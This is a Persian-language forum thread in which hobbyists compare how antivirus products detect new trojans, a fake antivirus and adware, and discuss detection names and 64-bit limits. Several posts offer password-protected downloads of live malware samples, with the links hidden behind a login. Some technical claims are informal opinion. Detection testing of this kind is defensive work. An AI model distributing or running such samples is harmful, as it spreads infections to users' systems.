سلام

جی دیتا ، 30/ 3 / 89 ساعت 21 - شناخت و حذف کرد .



پس آفرین به بیت دفندر که دیتابیسش رو زود آپدیت میکنه. البته الان هم از روی دیتابیس تشخیص نداده بلکه از طریق هوش مصنوعی اون رو شناسایی کرده. :31:

Trojan.Generic.KD.17074

Generic, Artemis, Gen, a variant, Heur و غیره عنوانهایی هستند که در شناسایی توسط هوش مصنوعی بکار برده میشند.

از بقیه آنتی ویروسها خبری نیست... همه خوابند :19::18:

نمیدونم چرا کسپر من 19 تا رو شناسایی میکنه. با وجودیکه تنظیماته کسپر رو چند بار تغییر دادم و روی حالت سختگیرانه ترینه ممکن گذاشتم ولی باز هم همون 19 تا رو بیشتر نشناخت. کسپر شما چه ورژن و چه تنظیماتی داره Dreamland عزیز؟
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلام...
محسن جان تنظیماتش دیفالته ، نسخهء 2011

Trojan.Generic.KD.17074


سلام

بله درسته ، دقیقا همین عبارت رو نوشته ، میشه یه خرده در این مورد برام توضیح بدید و پیامهای هشدار رو که بطور معمول در مواجهه

با انواع مخربها نمایش داده میشه رو بفرمایید ، ممنون .



عشق ، هم آمدنی است و هم آموختنی .

میخوام اجرا کنم ولی اصلا اجرا نمیشه
یعنی الان ویروسی شدم:18:؟
چطوری باید متوجه بشم که ویروسی شدم؟

همونطور که قبلا هم گفتم Hitman Pro و Malwarebytes Antimalware میتونند تشخیص بدند. الان با MBAM امتحان کردم و تشخیص داد. بهتره سیستمتو باهاش فول اسکن کنی.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر این برنامه رو نداری از لینک زیر دانلودش کن. رایگان هست و میتونی برای اسکن گاه گداری ازش استفاده کنی. قبلش هم حتما آپدیت کن.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام

از 4 تروجان پست 235 ، جی دیتا سومی و چهارمی رو شناخت ، 1 و 2 رو نشناخت .


عشق ، هم آمدنی است و هم آموختنی .

سلام

بله درسته ، دقیقا همین عبارت رو نوشته ، میشه یه خرده در این مورد برام توضیح بدید و پیامهای هشدار رو که بطور معمول در مواجهه

با انواع مخربها نمایش داده میشه رو بفرمایید ، ممنون .


امیر جان راستش سوالت رو خیلی کلی پرسیدی و نمیشه همش رو توضیح داد.

در حال حاضر تقریبا اکثر آنتی ویروسها از تکنولوژی هوش مصنوعی یا همان Heuristic استفاده میکنند. بعضی از آنتی ویروسها هوش مصنوعی خوبی دارند و وقتی فایلی رو که هنوز در دیتابیشون ثبت نشده تشخیص میدند ضریب خطاشون خیلی کمه و دارای کمترین False positive هستند مانند NOD32 اما بعضی های دیگه اگر در قسمت تنظیمات هوش مصنوعی قسمت Packer های ناشناخته فعال بشه ضریب خطاشون میره بالا و ممکنه حتی فایل های سالمی که آلوده نیستند را هم آلوده اعلام کنه مانند Avira Antivir به همین دلیل در آخرین تست هوش مصنوعی آنتی ویروسها که از طرف Av-Comparatives هر ساله انجام میشه و نتیجه اش در همین ماه منتشر شد آنتی ویروسهایی که میشه در تنظیمات هوش مصنوعیشون قسمت Packer های ناشناخته شون رو انتخاب نکرد, قبل از انجام تست و به دلیل اینکه تشخیص های کاذب یا همان FP را نداشته باشند از Av-Comparative در خواست کردند که با تنظیمات اعلام شده از طرف شرکت آنتی ویروسها تست را انجام بدند. یکی از این آنتی ویروسها Avira Antivir بود. بعد از تست Avira Antivir موفق شد با شناسایی 53 درصد از 27000 فایل آلوده ناشناخته با کمترین تشخیص کاذب نشان Advanced+ را کسب کنه.

پیغامهای هوش مصنوعی هر آنتی ویروس نسبت هر فایل آلوده ی ناشناخته که در دیتابیس آنتی ویروس نباشه فرق میکنه. مثلا این پیغامها برای کرمها, تروجانها, دانلودر ها, اسپای ور ها و غیره... در هر آنتی ویروس فرق میکنه و همیشه یک پیغام ثابت رو به کاربر نشون نمیده. اما نوع پیغام میتونه نشون دهنده کرم, ویروس و یا تروجان بودن فایل آلوده باشه. زمانی یک پیغام میتونه یک فایل آلوده ی ناشناخته را به کاربر دقیق معرفی کنه که هوش مصنوعی آنتی ویروس از نکنولوژی برتری نسبت به آنتی ویروسهای دیگه استفاده کرده باشه.

بطور مثال وقتی ناد32 یک تروجان تازه را که قبلا صدها نمونه از اون تروجان رو در دیتابیسش ثبت کرده از طریق هوش مصنوعی پیدا میکنه به این اسم میتونه اون رو معرفی کنه. a variant of Win32/Kryptik.FAS اما همان تروجان و یا ویروس را آنتی ویروسهای دیگه با وجود اینکه از طریق هوش مصنوعی پیدا کردند اما در معرفی آن به کاربر دقیق عمل نمیکنند و کاربر دچار سرگیجه میشه

بطور مثال PrevX اکثرا High Risk Spyware یا High Risk Malware رو بکار میبره و یا آنتی ویروس پاندا Suspicious file یعنی فایل مشکوک را بکار میبره و آنتی ویروسی مانند Avast هم از نامهایی مانند Win32/Malware.Gen استفاده میکنه. اما زمانی که فایل آلوده در دیتابیس آنتی ویروسها بطور رسمی ثبت بشه اسم کاملی نسبت به خانواده ای که بهش تعلق داره بهش داده میشه. مثلا Trojan-Spy.Win32.SpyEyes.ld. حالا اگر از این تروجان 100 ها نمونه دیگه هم ساخته بشه هیچ وقت نمیان اسم اون رو تغییر بدند بلکه فقط حرفهای آخر اون تغییر میکنه. به این صورت

Trojan-Spy.Win32.SpyEyes.ld
Trojan-Spy.Win32.SpyEyes.le
Trojan-Spy.Win32.SpyEyes.lf
Trojan-Spy.Win32.SpyEyes.lg
Trojan-Spy.Win32.SpyEyes.gxa

از اسم بالا که که بعد از ثبت شدن در دیتابیس توسط کسپرسکی معرفی شده میشه از روی Win32 این نکته را هم متوجه شد که این این تروجان طوری نوشته شده که بتونه از برنامه های Win32 استفاده کنه. به این برنامه ها میگند API. برنامه های Win32 API مجموعه ای از توابع و کارکرد برنامه است که اجازه ی در اختیار گرفتن تمام اجزای یک سیستم عامل را بهش میده. برنامه های Win32 معمولا در سیستم عامل ویندوز اجرا میشوند و در سیستم عامل های دیگه نمیتونند دسترسی داشته رباشند.

.SpyEyes هم خانواده این تروجان است. مثل اسم فامیل و یا نام خانوادگی افراد و نشون میده که این تروجان در اصل از کدام خانواده است و چه اصل و نصبی داره. :31:

Rootkit ها معمولا با اسم های دیگه ای معرفی میشوند و در بعضی موارد حتی 32 بیتی یا 64 بیتی بودنشون هم در اسمشون بکار برده میشه چون تقریبا اکثر Rootkit ها و حتی تروجانها برای سیستم عامل 32 بیتی نوشته میشند و در سیستم عامل 64 بیتی حتی اجرا هم نمیشند چه برسه به اینکه بخوان خرابکاری بکنند و یا به جایی از سیستم عامل دسترسی داشته باشند. چون هسته کرنل 64 بیتی ها با 32 بیتی ها فرق میکنه و این اجازه رو به ویروسها و تروجانها نمیده. به همین دلیل سیستم عامل های 64 بیتی امنیت بیشتری را نسبت به 32 بیتی ها دارند. حتی شرکت های مهمی مانند Kapersky, Norton, Avast و غیره هنوز نتونستند رمز ورود به هسته 64 بیتی را پیدا کنند. حالا اگر در آینده این شرکت ها میتونند با همکاری مایکروسافت برنامه هاشون رو تکمیل کنند یا نه خبری ندارم و فکر نکنم جایی هم مطلبی درباره این موضوع پیدا بشه. اما نوقصی که فعلا این شرکت ها در برنامه هاشون با هسته ی 64 بیتی دارند اینها هستند...

کسپرسکی نتونسته حتی در نسخه 2011 از تمام امکانات Sandbox که در کسپرسکی به اسم Safe Run شناخته میشه استفاده کنه و Sandbox در سیستم عامل های 64 بیتی با محدودیت نامشخص کار میکنه.

Avast قول داده در نسخه 5.1 بتونه قسمت Boot Scan را یعنی همان قسمتی که قبل از بالا آمدن سیستم عامل شروع به اسکن میکنه را فعال کنه. فعلا Boot Scan در نسخه 5.0.545 برای 64 بیتی ها کار نمیکنه.
Behavior Blocker که از نسخه 5 به آنتی ویروس Avast اضافه شده در 64 بیتی کار نمیکنه و بیخودی فقط از منابع سیستم استفاده میکنه این تکنولوژی در این آنتی ویروس کمی باعث پایین آمدن سرعت رایت و رید فایل ها میشه.

نورتون هنوز به هسته ی 64 بیتی احتیاج پیدا نکرده چون فعلا در دستور کار نورتون سیستم دفاعی HIPS قرار نگرفته.

Zemana Antilogger در وب سایت رسمی خودش رسما اعلام کرده هر وقت مایکروسافت با ما همکاری کرد ما هم برنامه ی 64 بیتی خودمون رو برای تقاضا کنندگان بیرون میدیم. این برنامه یکی از بهترین برنامه های امنیتی برای سیستم عامل بحساب میاد و 32 بیتی بودن اون خیلی ها رو ناراضی کرده.

Outpost Pro نسخه ی 64 بیتی خودش رو بیرون داده اما این نسخه فقط سرویس و اینترفیس 64 بیتی داره و نتونسته هسته کرنل ویندوز 64 بیتی رو در اختیار خودش بگیره. به همین دلیل بعضی افراد با حداکثر کردن تنظیمات این فایروال سیستمشون فریز میشه. ماوس و کیبرد از کار میوفته اما دستکتاپ کار میکنه و راهی جز ریستارت وجود نداره.

مشکل فریز شده را در نسخه 7 کمی تا حدودی تونست حل بکنه اما هسته را نه.

و به همین شکل ادامه داره... :31:

البته خبری از Comodo و TrendMicro ندارم چون تحقیقی در موردشون نکردم و نمیدونم که آیا این نرم افزار ها هم به شیوه ی Outpost pro نسخه های 64 بیتی را ارائه کردند و یا یک 64 بیتی واقعی هستند.

همونطور که قبلا هم گفتم Hitman Pro و Malwarebytes Antimalware میتونند تشخیص بدند. الان با MBAM امتحان کردم و تشخیص داد. بهتره سیستمتو باهاش فول اسکن کنی.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر این برنامه رو نداری از لینک زیر دانلودش کن. رایگان هست و میتونی برای اسکن گاه گداری ازش استفاده کنی. قبلش هم حتما آپدیت کن.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
سلام
واقعا دستت درد نکنه
3 تا ویروس جدید دیگه هم شناخت
حتی نورتونا قبلش فول اسکن هم کردم ولی اون 3 تا ویروسو نشناخت
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

داداش من با ای پی خودم فرستادم که معلومه برای ایرانه بلافاصله جواب میده . تا حالا 3تا فایل رو هم فرستادم . شما چی جوری میگین جواب نمیده من که در تعجبم ؟[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


خوب میدونی کار وی pان چیه؟؟
عوض کردن ایپی ها
یعنی مثلا ایپی ایران میشه ایپی انگلیس.
ممنون.

تروجان جدید.

Trojan-Downloader.Win32.Agent.dvzd


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود تروجان...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123

---------- Post added at 10:26 AM ---------- Previous post was at 10:23 AM ----------


سلام
واقعا دستت درد نکنه
3 تا ویروس جدید دیگه هم شناخت
حتی نورتونا قبلش فول اسکن هم کردم ولی اون 3 تا ویروسو نشناخت
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

خواهش میکنم.

اون Microsoft.exe چی بوده دیگه توی ویندوز جا خوش کرده؟ :18:
کاش میتونستی قبل یک کپی ازش رو جایی آپلود کنی. البته اگر میتونی کپیشو از توی قرنطینه ی MBAM با ریستور کردن در جای شخصی بدست بیاری. اگر هم نیست بیخیالش. :46:

تروجان جدید.

Trojan-Downloader.Win32.Agent.dvzd


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود تروجان...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123

---------- Post added at 10:26 AM ---------- Previous post was at 10:23 AM ----------



خواهش میکنم.

اون Microsoft.exe چی بوده دیگه توی ویندوز جا خوش کرده؟ :18:
کاش میتونستی قبل یک کپی ازش رو جایی آپلود کنی. البته اگر میتونی کپیشو از توی قرنطینه ی MBAM با ریستور کردن در جای شخصی بدست بیاری. اگر هم نیست بیخیالش. :46:
نورتون اجازه نمیده اجرا بشه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اینم ویروس Microsoft.exeکه فرمودین آپ کنم

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد 123

:18: باور نکردنیه چند صفحه تاپیک رفته جلو.

چقدر طول می کشه بخونمشون شب امتحانی :31:

خسته نباشید به بچه های علاقه مند به ویروس:10:



دوستان موقعی که من می خواستم این فایل bot.exe رو بفرستم و اتچش کنم سایت ام اس ان ویروسی شناخت و اجازه نداد ! مگه این نوع سایتها هم انلاین اسکن میکنن که ویروسی شناخت و از چه نوع انتی ویروسی استفاده می کنن؟

از طریق جی میل بفرست. لابد کرده دیگه :-)



خیلی جالبه
هر چهار تا رو نود میشناسه ولی دوتاشو فقط کسپر میشناسه. نمیدونم اگه اینطوریه پس اینهمه آپدیت که کسپر در طول روز میگیره، چیو آپدیت میکنه؟ در هر روزش به اندازه 2 ماهه نود آپدیت میگیره بعدش میبینیم که در مورده شناسایی ویروسها هیچ فرقی نداره با نود و خیلی وقتها هم ضعیفتر عمل میکنه. نتایج av-comparative هم نشون ندهنده اینه. کسی میدونه چرا؟


آپدیت نود32 بسته ای هست. یعنی هر چند ساعت یک بسته حاوی 50 تا 100 ویروس رو ارسال میکنه و فشرده هست مثل آویرا.

اما کسپر اپدیتش هر دقیقه هست و فشرده نیست. ام معمولا اپدیت های قدیمی رو فشرده تر می کنند و حجم خیلی بالا نمیره.

توی دیتا بیس خالی نود32 و کسپر خیلی تفاوت ندارند.



W32/Injector.fam!tr
ویروس جدید.
این ویروس رو فقط 1 آنتی ویروس به اسم Fortinet تا این لحظه میشناسه. همه آنتی ویروسهای دیگه فعلا :18::31:


رکورد فوق العاده ای بود Ava UK جان :) لذت بردیم



نورتون اجازه نمیده ویروس اجرا بشه:31::31:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

gharibe63 عزیز لطفا مخرب هارو اجرا نکنید. یا دیپ فیریز کنید.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید




مرسی جالب بود, اگر یکی که Kaspersky Internet Security داره این ویروس رو اجرا بکنه ببینیم کسپرسکی میتونه توسط Behavior blocker شناساییش کنه یا نه خوب میشد. من خودم کسپرسکی ندارم وگرنه اجراش میکردم. :31:
اگر کسی اجرا کرد ریسک اینکه کسپرسکی ممکنه در حالت اجرا شدن نشناسه با خودشه. :10:اگر هم شناخت یک آفرین به کسپرسکی میگیم و همه تشویقش میکنیم. :11:

فکر کنم اگه با سیف ران کسپر یا همون سندباکس اجرا بشه ریسک نباشه ؟ البته تا اجرا کنی که اون پیام خطای اجرا نشدن برنامه یا غیره میاد اصلا مشخص نمیشه توی باکس رفته یا نه

ولی تشویق رو هستم :)

---------- Post added at 04:53 PM ---------- Previous post was at 04:50 PM ----------


:31:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



دیریملند جان تعداد دیتکت مهم نیست مهم اخرشه که توی فایل rar چیزی نمونه :31: برای اون دوستی که 19 تا شناخته همین علت رو داشته. فکر میکنم کسپر یکی از ویروس ها به نام لوک فیری رو از این بسته نشناسه 2 ماه پیش که اینطوری بود :31:

---------- Post added at 04:58 PM ---------- Previous post was at 04:53 PM ----------


دوستانی که میگفتن کسپر دیگه به نامه های ایران جواب نمی ده و تشکر نمی کنه . به نظر من اون یک تغییر بوده که دیگه دو تا پیام ندن و یکی بدین و در متن پیامشون نواقصی بود که حالا کامل کردنو بعد از فرستادن فایل سریع اگه فایل ویروس جدید بود پیام میده و در همون پیام تشکر میکنه:31:
این تصویر مربوط به جوابهای قبلی
و این برای الان


اون پیامی که از طرف کسپر گذاشتم درسته. عکسش رو یکبار دیگه ببینید اسم ویروس رو باید بده. این هایی که میره توی دیتابیس احتمالا شانسی هست. اون فایل ویروسی که توی مجموعه ی 20 تایی بود رو هرکاری کردم نتونستم به کسپر حالی کنم مثل اینکه بعد از 2 ماه هم نشناخته. لوک فیری

بله دکتر جانdrhaniball
برا من 19 تا شناخت و یه دونش موند. خودم دستی حذفش کردم. راستی چرا نمیشناسه؟

بله دکتر جانdrhaniball
برا من 19 تا شناخت و یه دونش موند. خودم دستی حذفش کردم. راستی چرا نمیشناسه؟

اسم فایل اون یدونه ای که نمیشناسه چیه؟

اسم فایل اون یدونه ای که نمیشناسه چیه؟

اسمش lockfree.exe هستش که البته نورتون شناخت و حذفش کرد.

امیر جان راستش سوالت رو خیلی کلی پرسیدی و نمیشه همش رو توضیح داد.
در حال حاضر تقریبا اکثر آنتی ویروسها از تکنولوژی هوش مصنوعی یا همان Heuristic استفاده میکنند...........


من که دلم نیومد یه تشکر خالی فقط زیر این پست بزنم. Ava UK جان عالی بود :10:

من که وقت نکردم نمونه ها رو تست کنم. ولی این همه تعداد نمونه جدید وحشتناک بود مخصوصا اون پست 231 بی نظیر بود :11:.

خیلی زحمت کشیدی

از gharibe63 و mohsenpj که نمونه برای دانلود گذاشتند هم تشکر :11:

[SIZE=2]از gharibe63 و mohsenpj که نمونه برای دانلود گذاشتند هم تشکر :11:

خواهش میکنم دکتر drhaniball جان. ما باید از شما تشکر کنیم که اینقدر برا این بخش از فورام زحمت میکشید و اطلاع رسانی میکنید. بینهایت ممنونم:11:

اسمش lockfree.exe هستش که البته نورتون شناخت و حذفش کرد.

20 بار و در طی 2 ماه من این لوک فیری رو فرستادم ولی میبینید که هیچ اتفاقی نیوفتاده. البته این بسته ویروس رو هم از طرف خود Ava UK عزیز به دستم رسیده بود.

پس دیگه شکی نیست که حداقل این چند ماه اخیر رو بررسی نمی کردند.

[QUOTE=Ava UK;5088711]تروجان جدید.

Trojan-Downloader.Win32.Agent.dvzd


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود تروجان...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123


اقا کسپر مثل اب خوردن جک :34: و جونور هاش :16:رو شناخت

اینم ویروس Microsoft.exeکه فرمودین آپ کنم

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد 123[/QUOTE]
این رو هم کسپر شناخت راحت افرین به کسپر واقعن

[QUOTE=Ava UK;5088711]تروجان جدید.

Trojan-Downloader.Win32.Agent.dvzd


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود تروجان...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123


اقا کسپر مثل اب خوردن جک :34: و جونور هاش :16:رو شناخت

این خودش
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

داحلش یه clean sweep هست ( یا البته دانلود میکنه) که اونم نورتون بوسیله SONAR شناخت
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اینم ویروس Microsoft.exeکه فرمودین آپ کنم

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد 123
این رو هم کسپر شناخت راحت افرین به کسپر واقعن[/QUOTE]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

علیرضا جان شما تنظیمات دیفالت رو دارید ؟ این ویروس ماکروسافت روی سیستم ایشون نصب شده و نورتون هیچ حرکتی نکرده؟

علت چی می تونه باشه ؟

امیر جان راستش سوالت رو خیلی کلی پرسیدی و نمیشه همش رو توضیح داد.


سلام

Ava UK جان ، خیلی زحمتت دادم واقعا شرمنده شدم و بقول دکتر یه تشکر خالی خیلی کم بود

در مورد کار نکردن بعضی از گزینه ها در ویندوز های 64 بیتی که فرمودید این سئوال برام پیش اومد که آنتی ویروس جی دیتا در ویندوزهای

64 بیتی چطور کار میکنه ، چون ویندوز من 64 هستش و اگه با اون مشکل داره با 32 عوضش کنم ، بازم ممنون و شرمنده . :11:



عشق ، هم آمدنی است و هم آموختنی .

سلام

Ava UK جان ، خیلی زحمتت دادم واقعا شرمنده شدم و بقول دکتر یه تشکر خالی خیلی کم بود

در مورد کار نکردن بعضی از گزینه ها در ویندوز های 64 بیتی که فرمودید این سئوال برام پیش اومد که آنتی ویروس جی دیتا در ویندوزهای

64 بیتی چطور کار میکنه ، چون ویندوز من 64 هستش و اگه با اون مشکل داره با 32 عوضش کنم ، بازم ممنون و شرمنده . :11:


amir جان, G-Data با ویندوز های 64 بیتی مشکلی نداره و کاری رو که باید انجام بده انجام میده. کلا برنامه هایی که بخوان از درایو های 64 بیتی و یا هسته 64 بیتی خود ویندوز استفاده بکنند و اون رو در اختیار بگیرند معمولا مشکل پیدا میکنند مانند HIPS ها. تنها مشکلی که بعضی کاربران قبلا گزارش کرده بودند ساختن سی دی بوتیبل از طریق G-data بود که اونم در نسخه ی 2010 گزارش شده بود. البته این مشکل ربطی به 64 بیتی سیستم عامل نداشت و باگ نرم افزاری بود. الان در نسخه ی 2011 نمیدونم رفع شده یا نه. اگر خودتون باهاش مشکلی ندارید و برای شما خوب کار میکنه حتی اگر منم بگم مشکل داره نباید براتون مهم باشه چون کاری رو که شما دوست دارید براتون انجام بده رو داره انجام میده و توقع بیشتری هم ازش ندارید. :10:

چند نمونه جدید ...

خب اینم برای مشغولیت امروز :31::8:

امروز چند نمونه جدید میزارم. یکیش Adware هست. Adware ها در اصل خرابکاری آنچنانی نمیکنند اما باعث اذیت و آزار کاربران میشند بطور مثال با باز کردن یک صفحه اینترنتی 4 صفحه دیگه باهاش باز میشه و گاهی هم تبلیغات و از این جور کار ها میکنند.

این Adware رو تا بحال 4 آنتی ویروس طبق نتیجه اسکن زیر شناسایی کردند و هیچ کدام از آنتی ویروسهای معروف جزو این لیست نیستند. :13:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دومین نمونه یک آنتی ویروس قلابی است. شاید بعضی ها در جمع ما باشند که سیستمشون به این آنتی ویروسهای قلابی آلوده شده باشه. این آنتی ویروس ها و آنتی اسپای ور های قلابی فایل ستاپ دارند و اینستال میشند و سایت های این آنتی ویروسها آنچنان قشنگ طراحی میشه که قربانی فکر میکنه با یک آنتی ویروس خیلی خفن روبرو شده و زود دانلود و نصبش میکنه.

آنتی ویروسهای قلابی بعد از آلوده کردن سیستم و درخواست پول برای پاک کردن 4000000 آلودگی که در سیستم پیدا کردند درخواست Cash یعنی پول میکنند و تنها راه پرداختشم از طریق کارتهای اعتباری است. اما کارشون اینجا ختم نمیشه و بعضی از اونها تروجانهای دیگه ای رو هم در صورت اتصال به اینترنت دانلود میکنند و سیستم طرف رو از بیخ با هم داغون میکنند.

نتیجه اسکن این آنتی ویروس قلابی این شد که بعضی آنتی ویروسها مانند کسپرسکی و یا نورتون هنوز اون رو بطور رسمی در دیتابیس خودشون ثبت نکردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سومین نمونه هم یک تروجانیه که با دلفی نوشته شده و فعلا 7 آنتی ویروس اون رو شناسایی کردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود نمونه ها...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123

[SIZE=2]چند نمونه جدید ...

خب اینم برای مشغولیت امروز :31::8:


دانلود نمونه ها...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123

متاسفانه هیچکدوم رو نورتون نشناخت...

چند نمونه جدید ...

خب اینم برای مشغولیت امروز :31::8:

امروز چند نمونه جدید میزارم. یکیش Adware هست. Adware ها در اصل خرابکاری آنچنانی نمیکنند اما باعث اذیت و آزار کاربران میشند بطور مثال با باز کردن یک صفحه اینترنتی 4 صفحه دیگه باهاش باز میشه و گاهی هم تبلیغات و از این جور کار ها میکنند.

این Adware رو تا بحال 4 آنتی ویروس طبق نتیجه اسکن زیر شناسایی کردند و هیچ کدام از آنتی ویروسهای معروف جزو این لیست نیستند. :13:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددومین نمونه یک آنتی ویروس قلابی است. شاید بعضی ها در جمع ما باشند که سیستمشون به این آنتی ویروسهای قلابی آلوده شده باشه. این آنتی ویروس ها و آنتی اسپای ور های قلابی فایل ستاپ دارند و اینستال میشند و سایت های این آنتی ویروسها آنچنان قشنگ طراحی میشه که قربانی فکر میکنه با یک آنتی ویروس خیلی خفن روبرو شده و زود دانلود و نصبش میکنه.

آنتی ویروسهای قلابی بعد از آلوده کردن سیستم و درخواست پول برای پاک کردن 4000000 آلودگی که در سیستم پیدا کردند درخواست Cash یعنی پول میکنند و تنها راه پرداختشم از طریق کارتهای اعتباری است. اما کارشون اینجا ختم نمیشه و بعضی از اونها تروجانهای دیگه ای رو هم در صورت اتصال به اینترنت دانلود میکنند و سیستم طرف رو از بیخ با هم داغون میکنند.

نتیجه اسکن این آنتی ویروس قلابی این شد که بعضی آنتی ویروسها مانند کسپرسکی و یا نورتون هنوز اون رو بطور رسمی در دیتابیس خودشون ثبت نکردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدسومین نمونه هم یک تروجانیه که با دلفی نوشته شده و فعلا 7 آنتی ویروس اون رو شناسایی کردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود نمونه ها...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
نورتون فقط سومی رو میشناسه
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

من که آنتی ویروس اصل کاسپراسکای دارم به راحتی نابودش کرد

من که آنتی ویروس اصل کاسپراسکای دارم به راحتی نابودش کرد

ولی برا من کسپر نشناخت. البته من اجراشون نمیکنم و فقط اسکن میکنم. شاید اگه اجراشون کنم کسپر بر اساس رفتارشون اونا رو شناسایی کنه ولی هنوز وارد دیتابیسش نشدن.

من که آنتی ویروس اصل کاسپراسکای دارم به راحتی نابودش کرد
تو ویروس توتال که نمیشناسه:18:
کدوم ویروسو نابودش کرد(3 تا ویروس)؟
اجرا کردین که شناخت؟

اینم یه ................ مخربه دیگه
نتیجه اسکن توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیداینم خود ویروس

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد : 123

تو ویروس توتال که نمیشناسه:18:
کدوم ویروسو نابودش کرد(3 تا ویروس)؟
اجرا کردین که شناخت؟

حتما باید اجراش کرده باشه وگرنه من 10 بار با کسپر و نورتون اسکن کردم ولی هیچکدوم نشناختند.

چند نمونه جدید ...

خب اینم برای مشغولیت امروز :31::8:

امروز چند نمونه جدید میزارم. یکیش Adware هست. Adware ها در اصل خرابکاری آنچنانی نمیکنند اما باعث اذیت و آزار کاربران میشند بطور مثال با باز کردن یک صفحه اینترنتی 4 صفحه دیگه باهاش باز میشه و گاهی هم تبلیغات و از این جور کار ها میکنند.

این Adware رو تا بحال 4 آنتی ویروس طبق نتیجه اسکن زیر شناسایی کردند و هیچ کدام از آنتی ویروسهای معروف جزو این لیست نیستند. :13:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددومین نمونه یک آنتی ویروس قلابی است. شاید بعضی ها در جمع ما باشند که سیستمشون به این آنتی ویروسهای قلابی آلوده شده باشه. این آنتی ویروس ها و آنتی اسپای ور های قلابی فایل ستاپ دارند و اینستال میشند و سایت های این آنتی ویروسها آنچنان قشنگ طراحی میشه که قربانی فکر میکنه با یک آنتی ویروس خیلی خفن روبرو شده و زود دانلود و نصبش میکنه.

آنتی ویروسهای قلابی بعد از آلوده کردن سیستم و درخواست پول برای پاک کردن 4000000 آلودگی که در سیستم پیدا کردند درخواست Cash یعنی پول میکنند و تنها راه پرداختشم از طریق کارتهای اعتباری است. اما کارشون اینجا ختم نمیشه و بعضی از اونها تروجانهای دیگه ای رو هم در صورت اتصال به اینترنت دانلود میکنند و سیستم طرف رو از بیخ با هم داغون میکنند.

نتیجه اسکن این آنتی ویروس قلابی این شد که بعضی آنتی ویروسها مانند کسپرسکی و یا نورتون هنوز اون رو بطور رسمی در دیتابیس خودشون ثبت نکردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدسومین نمونه هم یک تروجانیه که با دلفی نوشته شده و فعلا 7 آنتی ویروس اون رو شناسایی کردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود نمونه ها...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
اقا کسپر اینها رو نشناخت از روی اسکن

اینم یه ................ مخربه دیگه
نتیجه اسکن توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیداینم خود ویروس

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد : 123
این رو هم کسپر نشناخت ارسالش دن براش

چند نمونه جدید ...

خب اینم برای مشغولیت امروز :31::8:

امروز چند نمونه جدید میزارم. یکیش Adware هست. Adware ها در اصل خرابکاری آنچنانی نمیکنند اما باعث اذیت و آزار کاربران میشند بطور مثال با باز کردن یک صفحه اینترنتی 4 صفحه دیگه باهاش باز میشه و گاهی هم تبلیغات و از این جور کار ها میکنند.

